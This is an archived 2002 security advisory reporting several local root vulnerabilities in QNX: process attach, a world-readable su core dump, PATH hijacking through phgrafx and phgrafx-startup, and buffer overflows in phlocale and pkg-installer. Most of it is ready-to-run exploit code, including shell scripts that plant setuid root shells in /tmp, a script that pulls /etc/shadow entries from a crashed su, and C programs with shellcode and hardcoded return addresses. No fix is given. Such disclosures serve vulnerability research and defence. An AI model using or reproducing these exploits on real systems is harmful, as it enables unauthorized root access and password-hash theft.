4th Jun 2002 [SBWID-5394]
COMMAND
QNX buffer overflows and other goodies...
SYSTEMS AFFECTED
Current QNX distribution
PROBLEM
badc0ded@badc0ded.com found many bugs on QNX:
Issue 0x0 Kernel
================
QNX Allows local users to attach to any process. Not being familiar
with the QNX API and terminology, I can only describe it as if you
could attach to ANY process with ptrace() regardless of your uid/euid.
An example to clear things up :)
$ cat tmp.c
main ()
{
printf(\"euid=%i\\n\",geteuid());
}
$ ls -l tmp
-rwsr-xr-x 1 root 100 4021 May 20 13:31 tmp
$ ./tmp
euid=0
So far everything is normal.
$ gdb tmp
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type \"show copying\" to see the conditions.
There is absolutely no warranty for GDB. Type \"show warranty\" for details.
This GDB was configured as \"--host=x86-pc-nto-qnx --target=ntox86\"...
(no debugging symbols found)...
(gdb) r
Starting program: /tmp/tmp
(gdb) c
Continuing.
euid=0
Program exited normally.
(gdb)
Uh oh.. not quite the result you would expect..
Exploit:
#!/bin/sh
#include <std_shouts.h>
#include <std_disclaimer.h>
#http://www.badc0ded.com
echo \"#!/bin/sh\" > /tmp/runme
echo cp /bin/sh /tmp/sh > /tmp/runme
echo chmod 4755 /tmp/sh >> /tmp/runme
chmod 755 /tmp/runme
echo r root -c /tmp/runme > /tmp/badc0ded
echo break *main+44 >> /tmp/badc0ded
echo c >> /tmp/badc0ded
echo \"call setuid(0)\" >> /tmp/badc0ded
echo c >> /tmp/badc0ded
gdb /bin/su < badc0ded > /dev/null
echo \"www.badc0ded.com\"
sleep 1
rm /tmp/runme /tmp/badc0ded
/tmp/sh
Issue 0x1 /bin/su
==================
/bin/su accepts SIGSEGV and dumps world readable core.
Exploit:
#!/bin/sh
#include <std_shouts.h>
#include <std_disclaimer.h>
# www.badc0ded.com <= we are in the .dot core, really :)
# If everything works you should get a \"copy\" of /etc/shadow
# in /tmp called mypasswd.
su > /dev/null &
kill -SEGV `ps -A | grep su | awk {\'print $1\'}`
strings /var/dumps/su.core | grep \":0:0\" > /tmp/mypasswd
Issue 0x2 phgrafx
==================
phgrafx executes crttrap with system() without first dropping its euid.
Exploit:
#!/bin/sh
#
# click advanced,done, apply, accept and done.
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo \"#!/bin/sh\" > /tmp/crttrap
echo \"cp /bin/sh /tmp/badc0ded\" >> /tmp/crttrap
echo \"chmod 4777 /tmp/badc0ded\" >> /tmp/crttrap
echo \"/usr/bin/crttrap \\$1 \\$2 \\$3 \\$4 \\$5 \\$6 \\$7 \\$8 \\$9 \" >> /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH=\"/tmp:$PATH\"
/usr/photon/bin/phgrafx
Issue 0x3 phgrafx-startup
=========================
Same problem as phgrafx
Exploit:
#!/bin/sh
#
# click test,restore,continue
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo \"#!/bin/sh\" > /tmp/crttrap
echo \"cp /bin/sh /tmp/badc0ded\" >> /tmp/crttrap
echo \"chmod 4777 /tmp/badc0ded\" >> /tmp/crttrap
echo \"/usr/bin/crttrap \\$1 \\$2 \\$3 \\$4 \\$5 \\$6 \\$7 \\$8 \\$9 \" >> /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH=\"/tmp:$PATH\"
/usr/photon/bin/phgrafx-startup
Issue 0x4 phlocale
==================
$ABLANG Buffer overflows and other goodies..
Exploit:
/* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell.
* If it doesnt work for you, then you most likely need to change
* the address to system() and/or the ret.
*
* www.badc0ded.com
*/
main ()
{
char s[]=\"\\xeb\\x0e\\x31\\xc0\\x5b\"
\"\\x88\\x43\\x2\\x53\\xbb\"
\"\\x80\\x95\\x04\\x08\" //system() address
\"\\xff\\xd3\\xe8\\xed\\xff\"
\"\\xff\\xff\\x73\\x68\";
char payload[1000];
memset (payload,0x90,sizeof(payload));
sprintf(payload+971,\"%s%s\",s,\"\\x78\\x7b\\x04\\x08\");
setenv(\"ABLANG\",payload);
execlp(\"/usr/photon/bin/phlocale\",\"phlocale\",0);
}
Issue 0x5 pkg-installer.c
=========================
Simple cmdline buffer overflow in -u argument
Exploit:
/* Quick and dirty QNX pkg-installer root exploit.
* The shellcode sucks, it is longer than it has
* to be and you need the address to system() for
* it to work. Yes I know I\'m lazy....
*
* http://www.badc0ded.com
*/
main(int argc, char **argv)
{
int ret=0x804786d;
char *pret;
char s[]=\"\\xeb\\x0e\\x31\\xc0\\x5b\"
\"\\x88\\x43\\x2\\x53\\xbb\"
\"\\xe4\\xb4\\x04\\x08\" //system() address
\"\\xff\\xd3\\xe8\\xed\\xff\"
\"\\xff\\xff\\x73\\x68\";
char payload[2000];
if (argc>=2)
ret=ret-atoi(argv[1]);
pret=&ret;
printf(\"using ret %x\\n\",ret);
memset(payload,0x90,1254);
sprintf(payload+1254,\"%s%s\",s,pret);
execlp(\"/usr/photon/bin/pkg-installer\",\"pkg-installer\",\"-u\",payload,0);
}
SOLUTION
Nothing yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
